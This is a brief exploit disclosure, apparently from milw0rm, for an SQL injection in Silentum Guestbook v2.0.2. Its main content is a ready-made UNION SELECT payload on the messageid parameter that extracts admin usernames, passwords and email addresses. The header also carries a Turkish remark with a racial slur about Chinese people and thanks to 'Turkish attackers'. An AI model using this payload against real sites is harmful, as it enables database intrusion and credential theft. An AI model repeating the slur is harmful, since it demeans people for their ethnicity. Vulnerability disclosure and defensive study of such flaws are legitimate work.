##Silentum Guestbook v2.0.2 (silentum_guestbook.php) Sql Injection Vuln.
#######################################################################
#######################################################################
##Yazar: Bgh7
##
##Turk Bilisim Gucleri Group / Ihlilal Hatti
##
##ByBgh7[a]msn.com
##
##Http://Bgh7.Blogspot.Com
##
##Bug: Sql Injection
##
##Ä°ndir/Download: http://hypersilence.net/silentum_guestbook.php
##
##Biz ki neler gÃ¶rdÃ¼k, biz ki neler Ã§ektik... 2-3 Ã‡ekik gÃ¶zlÃ¼den mi korkacaÄŸÄ±z ?
##Ã‡in sÃ¶mÃ¼recek bir rezerv daha bulduÄŸunu sanÄ±yor, yazÄ±k...
#######################################################################
#######################################################################
Sql: silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name,0x3a,u_password,0x3a,u_email),0,0 FROM silentum_admin/**
#######################################################################
#######################################################################
Thanks: m3rcil3sS & GhostKing & milw0rm & All TurkÄ±sh Attackers

# milw0rm.com [2009-07-20]